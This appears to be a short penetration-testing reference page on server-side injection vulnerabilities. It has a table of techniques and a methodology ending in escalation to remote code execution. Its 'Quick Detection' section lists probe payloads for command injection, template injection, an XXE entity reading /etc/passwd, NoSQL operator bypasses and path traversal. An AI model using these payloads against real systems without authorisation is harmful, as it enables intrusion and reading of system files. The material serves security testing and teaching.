Injection Vulnerabilities¶
Injection attacks exploit improper input handling to execute unintended commands, queries, or code on the server side.
Categories¶
| Technique | Target | Impact |
|---|---|---|
| Command Injection | OS shell | RCE |
| SSTI | Template engines | RCE |
| XXE | XML parsers | File read, SSRF, RCE |
| NoSQL Injection | MongoDB, etc. | Auth bypass, data leak |
| GraphQL | GraphQL APIs | Data leak, DoS |
| API Attacks | REST/API endpoints | Auth bypass, rate limit bypass |
| Path Traversal | File system | Arbitrary file read |
| File Upload | Upload handlers | RCE, XSS |
Quick Detection¶
# Command Injection
; id
| whoami
$(id)
# SSTI
{{7*7}}
${7*7}
<%= 7*7 %>
# XXE
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
# NoSQL
{"$ne": null}
{"$gt": ""}
# Path Traversal
../../../etc/passwd
..%2f..%2f..%2fetc%2fpasswd
Methodology¶
- Identify input vectors - Parameters, headers, file uploads, JSON bodies
- Determine technology - Framework, language, database
- Test for injection - Use detection payloads
- Confirm vulnerability - Time-based, error-based, or OOB callbacks
- Escalate - File read → SSRF → RCE